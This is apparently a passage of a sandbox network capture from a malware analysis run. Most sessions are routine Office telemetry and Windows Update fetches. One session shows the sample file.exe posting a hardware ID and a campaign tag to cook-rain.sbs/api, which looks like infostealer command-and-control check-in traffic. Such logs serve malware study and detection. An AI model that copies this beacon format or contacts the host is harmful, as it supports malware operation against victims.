                                                                                                                                                                              2024-11-21 07:30:23 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              20192.168.2.64972813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:23 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:23 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                              ETag: "0x8DC582BB344914B"
                                                                                                                                                                              x-ms-request-id: 4e7b5ce8-701e-0098-117a-3b395f000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073023Z-178bfbc474b7cbwqhC1NYC8z4n000000013g000000004csd
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:23 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              21192.168.2.649731188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:23 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=19IFBL013CI8O0IP
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1241
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:23 UTC1241OUTData Raw: 2d 2d 31 39 49 46 42 4c 30 31 33 43 49 38 4f 30 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 37 32 30 44 35 36 34 45 34 46 30 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 31 39 49 46 42 4c 30 31 33 43 49 38 4f 30 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 39 49 46 42 4c 30 31 33 43 49 38 4f 30 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                              Data Ascii: --19IFBL013CI8O0IPContent-Disposition: form-data; name="hwid"493720D564E4F0CB63CFCF7E6C45F838--19IFBL013CI8O0IPContent-Disposition: form-data; name="pid"1--19IFBL013CI8O0IPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                              2024-11-21 07:30:24 UTC985INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:24 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=t3c25pfvvul0m7df4jc6eqaka3; expires=Mon, 17-Mar-2025 01:17:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNwEA2uQl%2BhgeEOFR9mkrnddOV6ALxtq%2BHk5YpAEPoHUE%2FlTXUP%2BQfO1x0jw5MNuTna0f7XgDFBY3irKlmIuQm4jyovy%2BeUtAgnnpd8v9cetk5CXB6MoKOCtZiLnRW4x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef9638e534394-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1604&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2153&delivery_rate=1777236&cwnd=168&unsent_bytes=0&cid=c42e92a5f275be0c&ts=759&x=0"
                                                                                                                                                                              2024-11-21 07:30:24 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                              2024-11-21 07:30:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              22192.168.2.64973013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:23 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:24 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 486
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                              ETag: "0x8DC582B9018290B"
                                                                                                                                                                              x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073024Z-1777c6cb754mqztshC1TEB4mkc0000000asg00000000c68d
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:24 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              23192.168.2.64973213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:24 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:24 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:24 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                              x-ms-request-id: d1e74057-c01e-0014-6563-3ba6a3000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073024Z-178bfbc474bmqmgjhC1NYCy16c000000013g00000000hfnt
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:24 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              24192.168.2.64973320.109.210.53443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:24 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WB29hw7aL49cTdZ&MD=L8dCy2SS HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                              2024-11-21 07:30:25 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Expires: -1
                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                              MS-CorrelationId: 3d06eafb-0fe9-47cb-a0f0-4b90cc785dd2
                                                                                                                                                                              MS-RequestId: ea09a65e-f1ce-4f74-9709-8a2c2c76aa2e
                                                                                                                                                                              MS-CV: ZNqNNRsaaEm8dsb7.0
                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:24 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                              2024-11-21 07:30:25 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                              2024-11-21 07:30:25 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              25192.168.2.64973513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:25 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:25 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                              x-ms-request-id: 63e0f5a8-701e-0032-207a-3ba540000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073025Z-178bfbc474bv7whqhC1NYC1fg40000000170000000002ymg
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:26 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              26192.168.2.64973613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:25 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:25 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                              x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073025Z-1777c6cb754g9zd5hC1TEBfvpw0000000atg00000000m9ug
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:26 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              27192.168.2.64973713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:25 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:25 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                              x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073025Z-1777c6cb7544n7p6hC1TEByvb40000000au000000000g8ap
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:26 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              28192.168.2.64973813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:26 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:26 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                              x-ms-request-id: 8189730a-201e-0003-216a-3bf85a000000
                                                                                                                                                                              x-ms-version: 2018-03-28
